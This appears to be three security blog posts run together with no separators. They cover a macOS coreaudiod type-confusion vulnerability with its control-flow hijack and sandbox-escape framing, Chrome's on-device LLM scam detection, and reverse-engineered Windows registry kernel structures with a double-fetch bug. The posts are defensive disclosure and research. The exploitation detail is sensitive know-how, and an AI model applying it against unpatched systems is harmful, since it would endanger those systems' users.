The operations leading to the crash indicated that at offset 0x68 of the HALS_Object it fetched, the code expected a pointer to an object with a vtable. The code would then look up a function within the vtable, which would presumably retrieve the object’s “workgroup port.”
When the fetched object was of type ioct (IOContext), everything functioned as normal. However, the test input my fuzzer generated was causing the function to fetch a HALS_Object of a different type, which led to an invalid function call. The following diagram shows how an attacker able to influence the pointer at offset 0x68 of a HALS_Object might hijack control flow.
This vulnerability class is referred to as a type confusion: the vulnerable code assumes that a retrieved object or struct is of a specific type, but it is possible to provide a different one. The object’s memory layout might be completely different, meaning memory accesses and vtable lookups might occur in the wrong place, or even out of bounds. Type confusion vulnerabilities can be extremely powerful because they often enable reliable exploits.
Affected Functions
The _XIOContext_Fetch_Workgroup_Port Mach message handler wasn’t the only function that assumed it was dealing with an ioct object without checking the type. The table below shows several other message handlers that suffered from the same issue:
Apple did perform proper type checking in some of the Mach message handlers. For example, the _XIOContext_PauseIO message handler, shown below, calls a function that checks whether the fetched object is of type ioct before using it. It is not clear why these checks were implemented in certain areas, but not others.
The impact of this vulnerability can range from an information leak to control flow hijacking. In this case, since the vulnerable code is performing a function call, an attacker could potentially control the data at the offset read during the type confusion, allowing them to control the function pointer and redirect execution. Alternatively, if the attacker can provide an object smaller than 0x68 bytes, an out-of-bounds read would be possible, paving the way for further exploitation opportunities such as memory corruption or arbitrary code execution.
Creating a Proof of Concept
Because my fuzzing harness was connected downstream in the Mach message handling process, it was important to build an end-to-end proof of concept that used the mach_msg API to send a Mach message to the vulnerable message handler within coreaudiod. Otherwise, we might have triggered a false positive, as in the case of the mig_deallocate crash, where we thought we had a bug but were actually just bypassing security checks.
In this case, however, the bug was triggerable using the mach_msg API, making it a legitimate opportunity for use as a sandbox escape. The proof-of-concept code I put together for triggering this issue on macOS Sequoia 15.0.1 can be found here.
It’s worth noting that code running on Apple Silicon uses Pointer Authentication Codes (PACs), which could make exploitation more difficult. In order to exploit this bug through an invalid vtable call, an attacker would need the ability to sign pointers, which would be possible if the attacker gained native code execution in an Apple-signed process. However, I only analyzed and tested this issue on x86-64 versions of macOS.
How Apple Fixed the Issue
I reported this type confusion vulnerability to Apple on October 9, 2024. It was fixed on December 11, 2024, assigned CVE-2024-54529, and a patch was introduced in macOS Sequoia 15.2, Sonoma 14.7.2, and Ventura 13.7.2. Interestingly, Apple mentions that the vulnerability allowed for code execution with kernel privileges. That part interested me, since as far as I could tell, execution was only possible as the _coreaudiod group, which is not equivalent to kernel privileges.
Apple’s fix was simple: since each HALS Object contains information about its type, the patch adds a check within the affected functions to ensure the fetched object is of type ioct before dereferencing the object and performing a function call.
You might have noticed that the offset dereferenced within the HALS Object is 0x70 in the updated version, but was 0x68 in the vulnerable version. Often, such struct modifications are not security relevant, but will differ based on other bug fixes or added features.
Recommendations
To prevent similar type confusion vulnerabilities in the future, Apple should consider modifying the CopyObjectByObjectID function (or any others that make assumptions about an object’s type) to include a type check. This could be achieved by passing the expected object type as an argument and verifying the type of the fetched object before returning it. This approach is similar to how deserialization functions often include a template parameter to ensure type safety.
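A hypothetical sketch of that recommendation: a lookup that enforces the caller's expected type. The names mirror the blog's reverse-engineered ones, but none of this is Apple's actual code:

```cpp
#include <cstdint>
#include <map>

// Toy HALS_Object carrying a four-character type code.
struct HALS_Object {
  uint32_t object_id;
  uint32_t type;  // e.g. 'ioct', 'clnt'
};

constexpr uint32_t kTypeIOContext = 0x696F6374;  // 'ioct'

class HALS_ObjectMap {
 public:
  void MapObject(HALS_Object* obj) { objects_[obj->object_id] = obj; }

  // Returns the object only if it exists AND matches the expected type,
  // so no handler can receive an object of the wrong kind.
  HALS_Object* CopyObjectByObjectID(uint32_t id, uint32_t expected_type) {
    auto it = objects_.find(id);
    if (it == objects_.end()) return nullptr;
    if (it->second->type != expected_type) return nullptr;  // reject confusion
    return it->second;
  }

 private:
  std::map<uint32_t, HALS_Object*> objects_;
};
```

With this shape, a handler like _XIOContext_Fetch_Workgroup_Port would pass kTypeIOContext and receive nullptr for any mismatched ID, centralizing the check instead of relying on each handler to remember it.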
Conclusion
This blog post described my journey into the world of macOS vulnerability research and fuzzing. I hope I have shown how a knowledge-driven fuzzing approach can allow rapid prototyping and iteration, a deep understanding of the target, and high-impact bugs.
In my next post, I will perform a detailed walkthrough of my experience attempting to exploit CVE-2024-54529.
Posted by Jasika Bawa, Andy Lim, and Xinghui Lu, Google Chrome Security
Tech support scams are an increasingly prevalent form of cybercrime, characterized by deceptive tactics aimed at extorting money or gaining unauthorized access to sensitive data. In a tech support scam, the goal of the scammer is to trick you into believing your computer has a serious problem, such as a virus or malware infection, and then convince you to pay for unnecessary services, software, or grant them remote access to your device. Tech support scams on the web often employ alarming pop-up warnings mimicking legitimate security alerts. We've also observed them to use full-screen takeovers and disable keyboard and mouse input to create a sense of crisis.
Chrome has always worked with Google Safe Browsing to help keep you safe online. Now, with this week's launch of Chrome 137, Chrome will offer an additional layer of protection using the on-device Gemini Nano large language model (LLM). This new feature will leverage the LLM to generate signals that will be used by Safe Browsing in order to deliver higher confidence verdicts about potentially dangerous sites like tech support scams.
Initial research using LLMs has shown that they are relatively effective at understanding and classifying the varied, complex nature of websites. As such, we believe we can leverage LLMs to help detect scams at scale and adapt to new tactics more quickly. But why on-device? Leveraging LLMs on-device allows us to see threats when users see them. We’ve found that the average malicious site exists for less than 10 minutes, so on-device protection allows us to detect and block attacks that haven't been crawled before. The on-device approach also empowers us to see threats the way users see them. Sites can render themselves differently for different users, often for legitimate purposes (e.g. to account for device differences, offer personalization, provide time-sensitive content), but sometimes for illegitimate purposes (e.g. to evade security crawlers) – as such, having visibility into how sites are presenting themselves to real users enhances our ability to assess the web.
How it works
At a high level, here's how this new layer of protection works.
Overview of how on-device LLM assistance in mitigating scams works
When a user navigates to a potentially dangerous page, specific triggers that are characteristic of tech support scams (for example, the use of the keyboard lock API) will cause Chrome to evaluate the page using the on-device Gemini Nano LLM. Chrome provides the LLM with the contents of the page that the user is on and queries it to extract security signals, such as the intent of the page. This information is then sent to Safe Browsing for a final verdict. If Safe Browsing determines that the page is likely to be a scam based on the LLM output it receives from the client, in addition to other intelligence and metadata about the site, Chrome will show a warning interstitial.
This is all done in a way that preserves performance and privacy. In addition to ensuring that the LLM is only triggered sparingly and run locally on the device, we carefully manage resource consumption by considering the number of tokens used, running the process asynchronously to avoid interrupting browser activity, and implementing throttling and quota enforcement mechanisms to limit GPU usage. LLM-summarized security signals are only sent to Safe Browsing for users who have opted in to the Enhanced Protection mode of Safe Browsing in Chrome, giving them protection against threats Google may not have seen before. Standard Protection users will also benefit indirectly from this feature as we add newly discovered dangerous sites to blocklists.
Future considerations
The scam landscape continues to evolve, with bad actors constantly adapting their tactics. Beyond tech support scams, in the future we plan to use the capabilities described in this post to help detect other popular scam types, such as package tracking scams and unpaid toll scams. We also plan to utilize the growing power of Gemini to extract additional signals from website content, which will further enhance our detection capabilities. To protect even more users from scams, we are working on rolling out this feature to Chrome on Android later this year. And finally, we are collaborating with our research counterparts to explore solutions to potential exploits such as prompt injection in content and timing bypass.
Welcome back to the Windows Registry Adventure! In the previous installment of the series, we took a deep look into the internals of the regf hive format. Understanding this foundational aspect of the registry is crucial, as it illuminates the design principles behind the mechanism, as well as its inherent strengths and weaknesses. The data stored within the regf file represents the definitive state of the hive. Knowing how to parse this data is sufficient for handling static files encoded in this format, such as when writing a custom regf parser to inspect hives extracted from a hard drive. However, for those interested in how regf files are managed by Windows at runtime, rather than just their behavior in isolation, there's a whole other dimension to explore: the multitude of kernel-mode objects allocated and maintained throughout the lifecycle of an active hive. These auxiliary objects are essential for several reasons:
To track all currently loaded hives, their properties (e.g., load flags), their memory mappings, and the relationships between them (especially for delta hives overlaid on top of each other).
To synchronize access to keys and hives within the multithreaded Windows environment.
To cache hive information for faster access compared to direct memory mapping lookups.
To integrate the registry with the NT Object Manager and support standard operations (opening/closing handles, setting/querying security descriptors, enforcing access checks, etc.).
To manage the state of pending transactions before they are fully committed to the underlying hive.
To address these diverse requirements, the Windows kernel employs numerous interconnected structures. In this post, we will examine some of the most critical ones, how they function, and how they can be effectively enumerated and inspected using WinDbg. It's important to note that Microsoft provides official definitions only for some registry-related structures through PDB symbols for ntoskrnl.exe. In many cases, I had to reverse-engineer the relevant code to recover structure layouts, as well as infer the types and names of particular fields and enums. Throughout this write-up, I will clearly indicate whether each structure definition is official or reverse-engineered. If you spot any inaccuracies, please let me know. The definitions presented here are primarily derived from Windows Server 2019 with the March 2022 patches (kernel build 10.0.17763.2686), which was the kernel version used for the majority of my registry code analysis. However, over 99% of registry structure definitions appear to be identical between this version and the latest Windows 11, making the information directly applicable to the latest systems as well.
Hive structures
Given that hives are the most intricate type of registry object, it's not surprising that their kernel-mode descriptors are equally complex and lengthy. The primary hive descriptor structure in Windows, known as _CMHIVE, spans a substantial 0x12F8 bytes – exceeding 4 KiB, the standard memory page size on x86-family architectures. Contained within _CMHIVE, at offset 0, is another structure of type _HHIVE, which occupies 0x600 bytes, as depicted in the diagram below:
This relationship mirrors that of other common Windows object pairs, such as _EPROCESS / _KPROCESS and _ETHREAD / _KTHREAD. Because _HHIVE is always allocated as a component of the larger _CMHIVE structure, their pointer types are effectively interchangeable. If you encounter a decompiled access using a _HHIVE* pointer that extends beyond the size of the structure, it almost certainly indicates a reference to a field within the encompassing _CMHIVE object.
But why are two distinct structures dedicated to representing a single registry hive? While technically not required, this separation likely serves to delineate fields associated with different abstraction layers of the hive. Specifically:
_HHIVE manages the low-level aspects of the hive, including the hive header, bins, and cells, as well as in-memory mappings and synchronization state with its on-disk counterpart (e.g., dirty sectors).
_CMHIVE handles more abstract information about the hive, such as the cache of security descriptors, pointers to high-level kernel objects like the root Key Control Block (KCB), and the associated transaction resource manager (_CM_RM structure).
The next subsections will provide a deeper look into the responsibilities and inner workings of these two structures.
_HHIVE structure overview
The primary role of the _HHIVE structure is to manage the memory-related state of a hive. This allows higher-level registry code to perform operations such as allocating, freeing, and marking cells as "dirty" without needing to handle the low-level implementation details. The _HHIVE structure comprises 49 top-level members, most of which will be described in larger groups below:
0: kd> dt _HHIVE
nt!_HHIVE
   +0x000 Signature        : Uint4B
   +0x008 GetCellRoutine   : Ptr64 _CELL_DATA*
   +0x010 ReleaseCellRoutine : Ptr64 void
   +0x018 Allocate         : Ptr64 void*
   +0x020 Free             : Ptr64 void
   +0x028 FileWrite        : Ptr64 long
   +0x030 FileRead         : Ptr64 long
   +0x038 HiveLoadFailure  : Ptr64 Void
   +0x040 BaseBlock        : Ptr64 _HBASE_BLOCK
   +0x048 FlusherLock      : _CMSI_RW_LOCK
   +0x050 WriterLock       : _CMSI_RW_LOCK
   +0x058 DirtyVector      : _RTL_BITMAP
   +0x068 DirtyCount       : Uint4B
   +0x06c DirtyAlloc       : Uint4B
   +0x070 UnreconciledVector : _RTL_BITMAP
   +0x080 UnreconciledCount : Uint4B
   +0x084 BaseBlockAlloc   : Uint4B
   +0x088 Cluster          : Uint4B
   +0x08c Flat             : Pos 0, 1 Bit
   +0x08c ReadOnly         : Pos 1, 1 Bit
   +0x08c Reserved         : Pos 2, 6 Bits
   +0x08d DirtyFlag        : UChar
   +0x090 HvBinHeadersUse  : Uint4B
   +0x094 HvFreeCellsUse   : Uint4B
   +0x098 HvUsedCellsUse   : Uint4B
   +0x09c CmUsedCellsUse   : Uint4B
   +0x0a0 HiveFlags        : Uint4B
   +0x0a4 CurrentLog       : Uint4B
   +0x0a8 CurrentLogSequence : Uint4B
   +0x0ac CurrentLogMinimumSequence : Uint4B
   +0x0b0 CurrentLogOffset : Uint4B
   +0x0b4 MinimumLogSequence : Uint4B
   +0x0b8 LogFileSizeCap   : Uint4B
   +0x0bc LogDataPresent   : [2] UChar
   +0x0be PrimaryFileValid : UChar
   +0x0bf BaseBlockDirty   : UChar
   +0x0c0 LastLogSwapTime  : _LARGE_INTEGER
   +0x0c8 FirstLogFile     : Pos 0, 3 Bits
   +0x0c8 SecondLogFile    : Pos 3, 3 Bits
   +0x0c8 HeaderRecovered  : Pos 6, 1 Bit
   +0x0c8 LegacyRecoveryIndicated : Pos 7, 1 Bit
   +0x0c8 RecoveryInformationReserved : Pos 8, 8 Bits
   +0x0c8 RecoveryInformation : Uint2B
   +0x0ca LogEntriesRecovered : [2] UChar
   +0x0cc RefreshCount     : Uint4B
   +0x0d0 StorageTypeCount : Uint4B
   +0x0d4 Version          : Uint4B
   +0x0d8 ViewMap          : _HVP_VIEW_MAP
   +0x110 Storage          : [2] _DUAL
Signature
Equal to 0xBEE0BEE0, it is a unique signature of the _HHIVE / _CMHIVE structures. It may be useful in digital forensics for identifying these structures in raw memory dumps, and is yet another reference to bees in the Windows registry implementation.
Function pointers
Next up, there are six function pointers, initialized in HvHiveStartFileBacked and HvHiveStartMemoryBacked, and pointing at internal kernel handlers for the following operations:
GetCellRoutine (HvpGetCellPaged or HvpGetCellFlat): translates a cell index into a virtual address.
ReleaseCellRoutine (HvpReleaseCellPaged or HvpReleaseCellFlat): releases a previously translated cell index.
Allocate (CmpAllocate): allocates kernel memory within the global registry quota.
Free (CmpFree): frees kernel memory within the global registry quota.
FileWrite (CmpFileWrite): writes data to the hive file.
FileRead (CmpFileRead): reads data from the hive file.
As we can see, these functions provide the basic functionality of operating on kernel memory, cell indexes, and the hive file. In my opinion, the most important of them is GetCellRoutine, whose typical destination, HvpGetCellPaged, performs the cell map walk in order to translate a cell index into the corresponding address within the hive mapping.
It is natural to think that these function pointers could prove useful for exploitation if an attacker managed to corrupt them through a buffer overflow or a use-after-free condition. That was indeed the case in Windows 10 and earlier, but in Windows 11, these calls are now de-virtualized, and most call sites reference one of HvpGetCellPaged / HvpGetCellFlat and HvpReleaseCellPaged / HvpReleaseCellFlat directly, without referring to the pointers. This is great for security, as it completely eliminates the usefulness of those fields in any offensive scenarios.
Here's an example of a GetCellRoutine call in Windows 10, disassembled in IDA Pro:
And the same call in Windows 11:
Hive load failure information
This is a pointer to a public _HIVE_LOAD_FAILURE structure, which is passed as the first argument to the SetFailureLocation function every time an error occurs while loading a hive. It can be helpful in tracking which validity checks have failed for a given hive, without having to trace the entire loading process.
Base block
A pointer to a copy of the hive header, represented by the _HBASE_BLOCK structure.
Synchronization locks
There are two locks with the following purpose:
FlusherLock – synchronizes access to the hive between clients changing data inside cells and the flusher thread;
WriterLock – synchronizes access to the hive between writers that modify the bin/cell layout.
They are officially of type _CMSI_RW_LOCK, but they boil down to _EX_PUSH_LOCK, and they are used with standard kernel APIs such as ExAcquirePushLockSharedEx.
Dirty blocks information
Between offsets 0x58 and 0x84, _HHIVE stores several data structures representing the state of synchronization between the in-memory and on-disk instances of the hive.
Hive flags
First of all, there are two flags at offset 0x8C that indicate if the hive mapping is flat and if the hive is read-only. Secondly, there is a 32-bit HiveFlags member that stores further flags which aren't (as far as I know) included in any public Windows symbols. I have managed to reverse-engineer and infer the meaning of the constants I have observed, resulting in the following enum:
enum _HV_HIVE_FLAGS
{
  HIVE_VOLATILE = 0x1,
  HIVE_NOLAZYFLUSH = 0x2,
  HIVE_PRELOADED = 0x10,
  HIVE_IS_UNLOADING = 0x20,
  HIVE_COMPLETE_UNLOAD_STARTED = 0x40,
  HIVE_ALL_REFS_DROPPED = 0x80,
  HIVE_ON_PRELOADED_LIST = 0x400,
  HIVE_FILE_READ_ONLY = 0x8000,
  HIVE_SECTION_BACKED = 0x20000,
  HIVE_DIFFERENCING = 0x80000,
  HIVE_IMMUTABLE = 0x100000,
  HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL = 0x800000,
};
Below is a one-liner explanation of each flag:
HIVE_VOLATILE: the hive exists in memory only; set, e.g., for \Registry and \Registry\Machine\HARDWARE.
HIVE_NOLAZYFLUSH: changes to the hive aren't automatically flushed to disk and require a manual flush; set, e.g., for \Registry\Machine\SAM.
HIVE_PRELOADED: the hive is one of the default, system ones; set, e.g., for \Registry\Machine\SOFTWARE, \Registry\Machine\SYSTEM, etc.
HIVE_IS_UNLOADING: the hive is currently being loaded or unloaded in another thread and shouldn't be accessed before the operation is complete.
HIVE_COMPLETE_UNLOAD_STARTED: the unloading process of the hive has started in CmpCompleteUnloadKey.
HIVE_ALL_REFS_DROPPED: all references to the hive through KCBs have been dropped.
HIVE_ON_PRELOADED_LIST: the hive is linked into a list via the PreloadedHiveList field.
HIVE_FILE_READ_ONLY: the underlying hive file is read-only and shouldn't be modified; indicates that the hive was loaded with the REG_OPEN_READ_ONLY flag set.
HIVE_SECTION_BACKED: the hive is mapped in memory using section views.
HIVE_DIFFERENCING: the hive is a differencing one (version 1.6, loaded under \Registry\WC).
HIVE_IMMUTABLE: the hive is immutable and cannot be modified; indicates that it was loaded with the REG_IMMUTABLE flag set.
HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL: the kernel always maintains a local copy of every page of the hive, either by locking it in physical memory or creating a private copy through the CoW mechanism.
Log file information
Between offsets 0xA4 and 0xCC, there are a number of fields related to log file management, i.e. the .LOG1/.LOG2 files accompanying the main hive file on disk.
Hive version
The Version field stores the minor version of the hive, which should theoretically be an integer between 3 and 6. However, as mentioned in the previous blog post, it is possible to set it to an arbitrary 32-bit value either by specifying a major version equal to 0 and any desired minor version, or by enticing the kernel to recover the hive header from a log file, and abusing the fact that the HvAnalyzeLogFiles function is more permissive than HvpGetHiveHeader. Nevertheless, I haven't found any security implications of this behavior.
View map
The view map holds all the essential information about how the hive is mapped in memory. The specific implementation of registry memory management has evolved considerably over the years, with its details changing between consecutive system versions. In the latest ones, the view map is represented by the top-level _HVP_VIEW_MAP public structure:
0: kd> dt _HVP_VIEW_MAP
nt!_HVP_VIEW_MAP
   +0x000 SectionReference : Ptr64 Void
   +0x008 StorageEndFileOffset : Int8B
   +0x010 SectionEndFileOffset : Int8B
   +0x018 ProcessTuple     : Ptr64 _CMSI_PROCESS_TUPLE
   +0x020 Flags            : Uint4B
   +0x028 ViewTree         : _RTL_RB_TREE
The semantics of its respective fields are as follows:
SectionReference: Contains a kernel-mode handle to a section object corresponding to the hive file, created via ZwCreateSection in CmSiCreateSectionForFile.
StorageEndFileOffset: Stores the maximum size of the hive that can be represented with file-backed sections at any given time. Initially set to the size of the loaded hive, it can dynamically increase or decrease at runtime for mutable (normal) hives.
SectionEndFileOffset: Represents the size of the hive file section at the time of loading. It is never modified past the first initialization in HvpViewMapStart, and seems to be mostly used as a safeguard against extending an immutable hive file beyond its original size.
ProcessTuple: A structure of type _CMSI_PROCESS_TUPLE, it identifies the host process of the hive's section views. This field currently always points to the global CmpRegistryProcess object, which corresponds to the dedicated "Registry" process that hosts all hive mappings in the system. However, this field could enable a more fine-grained separation of hive mappings across multiple processes, should Microsoft choose to implement such a feature.
Flags: Represents a set of memory management flags relevant to the entire hive. These flags are not publicly documented; however, through reverse engineering, I have determined their purpose to be as follows:
VIEW_MAP_HIVE_FILE_IMMUTABLE (0x1): Indicates that the hive has been loaded as immutable, meaning no data is ever saved back to the underlying hive file.
VIEW_MAP_MUST_BE_KEPT_LOCAL (0x2): Indicates that all of the hive data must be persistently stored in memory, and not just accessible through file-backed sections. This is likely to protect against double-fetch conditions involving hives loaded from remote network shares.
VIEW_MAP_CONTAINS_LOCKED_PAGES (0x4): Indicates that some of the hive's pages are currently locked in physical memory using ZwLockVirtualMemory.
ViewTree: This is the root of a view tree structure, which contains the descriptors of each continuous section view mapped in memory.
Overall, the implementation of low-level hive memory management in Windows is more complex than might initially seem necessary. This complexity arises from the kernel's need to gracefully handle a variety of corner cases and interactions. For example, hives may be loaded as immutable, which indicates that the hive may be operated on in memory, but changes must not be flushed to disk. Simultaneously, the system must support recovering data from .LOG files, including the possibility of extending the hive beyond its original on-disk length. At runtime, it must also be possible to efficiently modify the registry data, as well as shrink and extend it on demand. To further complicate matters, Windows enforces different rules for locking hive pages in memory depending on the backing volume of the file, carefully balancing optimal memory usage and system security guarantees. These and many other factors collectively contribute to the complexity of hive memory management.
To better understand how the view tree is organized, let's first analyze the general logic of the hive mapping code.
The hive mapping logic
The main kernel function responsible for mapping a hive in memory is HvLoadHive. It implements the overall logic and coordinates various sub-routines responsible for performing more specialized tasks, in the following order:
Header Validation: The kernel reads and inspects the hive's header to ascertain its integrity, ensuring that the hive has not been tampered with or corrupted. Relevant function: HvpGetHiveHeader.
Log Analysis: The kernel processes the hive's transaction logs, scrutinizing them to identify any pending changes or inconsistencies that necessitate recovery procedures. Relevant function: HvAnalyzeLogFiles.
Initial Section Mapping: A section object is created based on the hive file, and further segmented into multiple views, each aligned to 4 KiB boundaries and capped at 2 MiB. At this point, the kernel prioritizes the creation of an initial mapping without focusing on the granular layout of individual bins within the hive. Relevant function: HvpViewMapStart.
Cell Map Initialization: The cell map, a component that translates cell indexes to memory addresses, is initialized. Its entries are configured to point to the newly created views. Relevant function: HvpMapHiveImageFromViewMap.
Log Recovery (if required): If the preceding log analysis reveals the need for data recovery, the kernel attempts to restore data integrity. This is the earliest point at which the newly created memory mappings may already be modified and marked as "dirty", indicating that their contents have been altered and require synchronization with the on-disk representation. Relevant function: HvpPerformLogFileRecovery.
Bin Mapping: In this final stage, the kernel establishes definitive memory mappings for each bin within the hive, ensuring that each bin occupies a contiguous region of memory. This process may necessitate creating new views, eliminating existing ones, or adjusting their boundaries to accommodate the specific arrangement of bins. Relevant function: HvpRemapAndEnlistHiveBins.
Now that we understand the primary components of the loading process, we can examine the internal structure of the section view tree in more detail.
The view tree
Let's consider an example hive consisting of three bins of sizes 256 KiB, 2 MiB and 128 KiB, respectively. After step 3 ("Initial Section Mapping"), the section views created by the kernel are as follows:
As we can see, at this point the kernel doesn't concern itself with bin boundaries or continuity: all it needs to achieve is to make every page of the hive accessible through a section view for log recovery purposes. In simple terms, HvpViewMapStart (or more specifically, HvpViewMapCreateViewsForRegion) creates as many 2 MiB views as necessary, followed by one final view that covers the remaining part of the file. So in our example, we have the first view covering bin 1 and the beginning of bin 2, and the second view covering the trailing part of bin 2 and the entire bin 3. It's important to note that memory continuity is only guaranteed within the scope of a single view, and views 1 and 2 may be mapped at completely different locations in the virtual address space.
Later in step 6, the system ensures that every bin is mapped as a contiguous block of memory before handing off the hive to the client. This is done by iterating through all the bins, and for every bin that spans more than one view in the current view map, the following operations are performed:
If the start and/or the end of the bin fall into the middle of existing views, these views are truncated from either side. Furthermore, if there are any views that are fully covered by the bin, they are freed and removed from the tree.
A new, dedicated section view is created for the bin and inserted into the view tree.
In our hypothetical scenario, the resulting view layout would be as follows:
As we can see, the kernel shrinks views 1 and 2, and creates a new view 3 corresponding to bin 2 to fill the gap. The final layout of the binary tree of section view descriptors is illustrated below:
Knowing this, we can finally examine the structure of a single view tree entry. It is not included in the public symbols, but I named it _HVP_VIEW. My reverse-engineered version of its definition is as follows:
struct _HVP_VIEW
{
  RTL_BALANCED_NODE Node;
  LARGE_INTEGER ViewStartOffset;
  LARGE_INTEGER ViewEndOffset;
  SSIZE_T ValidStartOffset;
  SSIZE_T ValidEndOffset;
  PBYTE MappingAddress;
  SIZE_T LockedPageCount;
  _HVP_VIEW_PAGE_FLAGS PageFlags[];
};
The role of each particular field is documented below:
Node: This is the structure used to link all of the entries into a single red-black tree, passed to helper kernel functions such as RtlRbInsertNodeEx and RtlRbRemoveNode.
ViewStartOffset and ViewEndOffset: This offset pair specifies the overall byte range covered by the underlying section view object in the hive file. Their difference corresponds to the cumulative length of the red and green boxes in a single row in the diagrams above.
ValidStartOffset and ValidEndOffset: This offset pair specifies the valid range of the hive accessible through this view, i.e. the green rectangles in the diagrams. It must always be a subset of the [ViewStartOffset, ViewEndOffset] range, and may dynamically change while re-mapping bins (as just shown in this section), as well as when shrinking and extending the hive.
MappingAddress: This is the base address of the section view mapping in memory, as returned by ZwMapViewOfSection. It is valid in the context of the process specified by _HVP_VIEW_MAP.ProcessTuple (currently always the "Registry" process). It covers the entire range between [ViewStartOffset, ViewEndOffset], but only pages between [ValidStartOffset, ValidEndOffset] are accessible, and the rest of the section view is marked as PAGE_NOACCESS.
LockedPageCount: Specifies the number of pages locked in virtual memory using ZwLockVirtualMemory within this view.
PageFlags: A variable-length array that specifies a set of flags for each memory page in the [ViewStartOffset, ViewEndOffset] range.
I haven't found any (un)official sources documenting the set of supported page flags, so below is my attempt to name them and explain their meaning:
VIEW_PAGE_VALID (0x1): Indicates whether the page is valid, i.e. true for pages between [ValidStartOffset, ValidEndOffset] and false otherwise. If this flag is clear, all other flags are irrelevant/unused.
The flag is set:
When creating section views during hive loading, first the initial ones in HvpViewMapStart, and then the bin-specific ones in HvpRemapAndEnlistHiveBins.
When extending an active hive in HvpViewMapExtendStorage.
The flag is cleared:
When trimming the existing views in HvpRemapAndEnlistHiveBins to make room for new ones.
When shrinking the hive in HvpViewMapShrinkStorage.
VIEW_PAGE_COW_BY_CALLER (0x2): Indicates whether the kernel maintains a copy of the page through the copy-on-write (CoW) mechanism, as initiated by a client action, e.g. a registry operation that modified data in a cell and thus resulted in marking the page as dirty.
The flag is set:
When dirtying a hive cell, in HvpViewMapMakeViewRangeCOWByCaller.
The flag is cleared:
When flushing the registry changes to disk, in HvpViewMapMakeViewRangeUnCOWByCaller.
VIEW_PAGE_COW_BY_POLICY (0x4): Indicates whether the kernel maintains a copy of the page through the copy-on-write (CoW) mechanism, as required by the policy that all pages of non-local hives (hives loaded from volumes other than the system volume) must always remain in memory.
The flag is set:
In HvpViewMapMakeViewRangeValid, as an alternative way of keeping a local copy of the hive pages in memory (if locking fails, or the caller doesn't want the pages locked).
In HvpViewMapMakeViewRangeCOWByCaller, when converting previously locked pages to the "CoW by policy" state.
In HvpMappedViewConvertRegionFromLockedToCOWByPolicy, when lazily converting previously locked pages to the "CoW by policy" state in a thread that runs every 60 seconds (as indicated by CmpLazyLocalizeIntervalInSeconds).
The flag is cleared:
In HvpViewMapMakeViewRangeUnCOWByPolicy, which currently only ever seems to happen for hives loaded from the system volume, i.e. "\SystemRoot" and "\OSDataRoot", as listed in the global CmpWellKnownVolumeList array.
VIEW_PAGE_WRITABLE (0x8): Indicates whether the page is currently marked as writable, typically as a result of a modifying operation on the page that hasn't yet been flushed to disk.
The flag is set:
In HvpViewMapMakeViewRangeCOWByCaller, when marking a cell as dirty.
The flag is cleared:
In HvpViewMapMakeViewRangeUnCOWByCaller, when flushing the hive changes to disk.
In HvpViewMapSealRange, when setting the memory as read-only for miscellaneous reasons (after performing log file recovery, etc.).
VIEW_PAGE_LOCKED (0x10): Indicates whether the page is currently locked in physical memory.
The flag is set:
In HvpViewMapMakeViewRangeValid if the caller requests page locking, and there is enough space left in the 64 MiB working set of the Registry process. In practice, this boils down to locking the initial 2 MiB hive mappings created in HvpViewMapStart for all app hives and for normal hives outside of the system disk volume.
The flag is cleared:
Whenever the state of the page changes to CoW-by-policy or Invalid in the following functions:
HvpViewMapMakeViewRangeCOWByCaller
HvpMappedViewConvertRegionFromLockedToCOWByPolicy
HvpViewMapMakeViewRangeUnCOWByPolicy
HvpViewMapMakeViewRangeInvalid
The semantics of most of the flags are straightforward, but perhaps VIEW_PAGE_COW_BY_POLICY and VIEW_PAGE_LOCKED warrant a slightly longer explanation. The two flags are mutually exclusive, and they represent nearly identical ways to achieve the same goal: ensure that a copy of each hive page remains resident in memory or a pagefile. Under normal circumstances, the kernel could simply create the necessary section views in their default form, and let the memory management subsystem decide how to handle their pages most efficiently. However, one of the guarantees of the registry is that once a hive has been loaded, it must remain operational for as long as it is active in the system. On the other hand, section views have the property that (parts of) their underlying data may be completely evicted by the kernel, and later re-read from the original storage medium such as the hard drive. So, it is possible to imagine a situation where:
A hive is loaded from a removable drive (e.g. a CD-ROM or flash drive) or a network share,
Due to high memory pressure from other applications, some of the hive pages are evicted from memory,
The removable drive with the hive file is ejected from the system,
A client subsequently tries to operate on the hive, but parts of it are unavailable and cannot be fetched again from the original source.
This could cause some significant problems and make the registry code fail in unexpected ways. It would also constitute a security vulnerability: the kernel assumes that once it has opened and sanitized the hive file, its contents remain consistent for as long as the hive is used. This is achieved by opening the file with exclusive access, but if the hive data was ever re-read by the Windows memory manager, a malicious removable drive or an attacker-controlled network share could ignore the exclusivity request and provide different, invalid data on the second read. This would result in a kind of "double fetch" condition and potentially lead to kernel memory corruption.
To address both the reliability and security concerns, Windows makes sure to never evict pages corresponding to hives for which exclusive access cannot be guaranteed. This covers hives loaded from a location other than the system volume, and since Windows 10 19H1, also all app hives regardless of the file location. The first way to achieve this is by locking the pages directly in physical memory with a ZwLockVirtualMemory call. It is used for the initial ≤ 2 MiB section views created while loading a hive, up to the working set limit of the Registry process currently set at 64 MiB. The second way is by taking advantage of the copy-on-write mechanism – that is, marking the relevant pages as PAGE_WRITECOPY and subsequently touching each of them using the HvpViewMapTouchPages helper function. This causes the memory manager to create a private copy of each memory page containing the same data as the original, thus preventing them from ever being unavailable for registry operations.
Between the two types of resident pages, the CoW type effectively becomes the default option in the long term. Eventually most pages converge to this state, even if they initially start as locked. This is because locked pages transition to CoW on multiple occasions, e.g. when converted by the background CmpDoLocalizeNextHive thread that runs every 60 seconds, or during the modification of a cell. On the other hand, once a page transitions to the CoW state, it never reverts to being locked. A diagram illustrating the transitions between the page residence states in a hive loaded from removable/remote storage is shown below:
For normal hives loaded from the system volume (i.e. without the VIEW_MAP_MUST_BE_KEPT_LOCAL flag set), the state machine is much simpler:
As a side note, CVE-2024-43452 was an interesting bug that exploited a flaw in the page residency protection logic. The bug arose because some data wasn't guaranteed to be resident in memory and could be fetched twice from a remote SMB share during bin mapping. This occurred early in the hive loading process, before page residency protections were fully in place. The kernel trusted the data from the second read without re-validation, allowing it to be maliciously set to invalid values, resulting in kernel memory corruption.
Cell maps
